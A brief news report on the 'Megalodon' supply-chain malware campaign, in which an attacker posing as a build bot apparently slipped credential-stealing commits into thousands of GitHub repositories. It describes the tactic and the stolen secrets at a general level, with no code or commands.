A dangerous new malware campaign called “Megalodon” is spreading across GitHub, and it’s targeting developers in a particularly sneaky way.
According to researchers at SafeDep, more than 5,500 repositories were found carrying malicious code designed to steal sensitive credentials from development environments and cloud infrastructure.
What makes the attack notable is how normal it looks. The attacker reportedly posed as an automated “build bot” and submitted seemingly harmless code contributions to open-source projects. If a maintainer accepted the commit, the malware quietly embedded itself into the repository and began harvesting secrets from CI/CD systems and developer machines.
The stolen data reportedly includes cloud access tokens, SSH keys, Docker and Kubernetes configurations, Terraform credentials, and authentication secrets tied to services like AWS, Azure, and Google Cloud.
The real danger comes from how software supply chains work. Once an infected repository is published to package platforms or reused in other projects, the malware can spread far beyond the original target. Researchers say this already happened in at least one case involving the Tiledesk project, where compromised code was unknowingly published to npm by legitimate maintainers.
Unlike traditional malware aimed at average users, campaigns like Megalodon focus on developers because compromising one trusted project can indirectly infect thousands of downstream systems.
Researchers also believe this may be the beginning of a wider trend. A separate threat group known as TeamPCP recently gained attention for targeting open-source ecosystems, and Megalodon appears inspired by similar tactics, even if it comes from a different actor.